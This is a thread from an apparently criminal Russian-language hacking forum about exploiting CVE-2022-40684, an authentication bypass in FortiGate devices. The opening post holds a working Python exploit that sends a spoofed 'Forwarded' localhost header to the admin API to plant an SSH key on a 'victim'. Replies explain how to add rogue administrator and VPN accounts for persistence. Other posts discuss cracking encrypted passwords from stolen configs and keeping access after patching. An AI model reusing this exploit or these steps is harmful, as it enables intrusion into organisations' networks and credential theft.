• XSS.stack #1 – первый литературный журнал от юзеров форума

фортик

CCod

(L3) cache
Пользователь
Регистрация
08.01.2022
Сообщения
280
Реакции
60
Всем привет.Эксплуатирую CVE-2022-40684(auth bypass в фортике).Написал такой скрипт для подгрузки своего ssh ключа:
import requests,sys

t=sys.argv[1]
headers={
"User-Agent": "Report Runner",
"Content-Type": "application/json",
"Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;",}

payload={"ssh-public-key1": "\"id_rsa.pub\""}
r=requests.put(t+"/api/v2/cmdb/system/admin/admin",headers=headers,data=payload,verify=False)

ключ сгенерировал так;
ssh-keygen

При попытке ssh admin@victim -i id_rsa :
nable to negotiate with victim port 22: no matching host key type found. Their offer: ssh-rsa

Как исправить?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
странная тема, после попыток раз 10 создать юзера, к клиенту хрен подключается с ошибкой -7200, никто не шарил данный эксплоит по поводу путей в директории где лежат сессии
тебе нужно добавить этого в разрешенные впн.
Если открыта web морда, можешь создать учетку администратора: "config system admin - edit admin123 - ...... и т.д.", создать своего пользователя: "config user local - ........"
Дальше стучись WEB и входи под своей новой учетке администратора. и расшаривай своего юзера в разрешенные впн подключения.
Если кому-то надо и не будет в падлу могу попробовать сделать маленький обзор.


Кто хотел: threads/74467/
 
Последнее редактирование:
Знает кто-нибудь как расшифровать подобные пароли из конфигов фортика?
set passwd ENC PVSOmNDqLM4GnBqtEBgX/eexea5msNuuZgWlR0gx7GRnyeKdh2Ou+BKxjZUp2gV23gaOOYpInPSvdTnxYWhXRYngUL31doQVvhzSMqfyUCAXqbelszR3kzqXZcGg+luw4w6TeP9feX8qwS0/TUkYBwbfY59hxA8Mm0dPp056Zppvmb0ZEjpBUgPQETj5otF4reIRRw==
 
Знает кто-нибудь как расшифровать подобные пароли из конфигов фортика?
set passwd ENC PVSOmNDqLM4GnBqtEBgX/eexea5msNuuZgWlR0gx7GRnyeKdh2Ou+BKxjZUp2gV23gaOOYpInPSvdTnxYWhXRYngUL31doQVvhzSMqfyUCAXqbelszR3kzqXZcGg+luw4w6TeP9feX8qwS0/TUkYBwbfY59hxA8Mm0dPp056Zppvmb0ZEjpBUgPQETj5otF4reIRRw==
Знал бы прикуп жил бы с Сочи :)
похоже никак, а обидно но то как, прое.ались мы попросту похоже
 
Там онлайн сервисы типо hashes, cmd5 или тот же hashcat не прокатывают, там шифрование на шифрование плюс пароль запрятан, в 2019 году была cve с разбором подобных паролей фортика, но сейчас вроде пофиксили, буду пытаться дальше тогда что-то придумать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
А вот я не успеваю сканить? что резов 0 на поиске? или успевают так быстро фиксить?
 
А вот я не успеваю сканить? что резов 0 на поиске? или успевают так быстро фиксить?
Сейчас уже большинство закрыли уязвимость, скоро не останется совсем ее у интересных компаний, есть смысл думать в сторону эксплуатации уже полученных конфигов, тогда можно получить доступ поверх даже закрытой уязвимости
 
Знает кто-нибудь как расшифровать подобные пароли из конфигов фортика?
set passwd ENC PVSOmNDqLM4GnBqtEBgX/eexea5msNuuZgWlR0gx7GRnyeKdh2Ou+BKxjZUp2gV23gaOOYpInPSvdTnxYWhXRYngUL31doQVvhzSMqfyUCAXqbelszR3kzqXZcGg+luw4w6TeP9feX8qwS0/TUkYBwbfY59hxA8Mm0dPp056Zppvmb0ZEjpBUgPQETj5otF4reIRRw==
Кодирование заключается в шифровании пароля фиксированным ключом с помощью DES (AES в режиме FIPS) и последующем кодировании результата в Base64.
 
Эта цитата из той статьи 2020 года с разбором старого cve которую я выше упоминал, из base 64 оно не конвертится обратно нормально, пробовал поиграться с этими кодировками
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх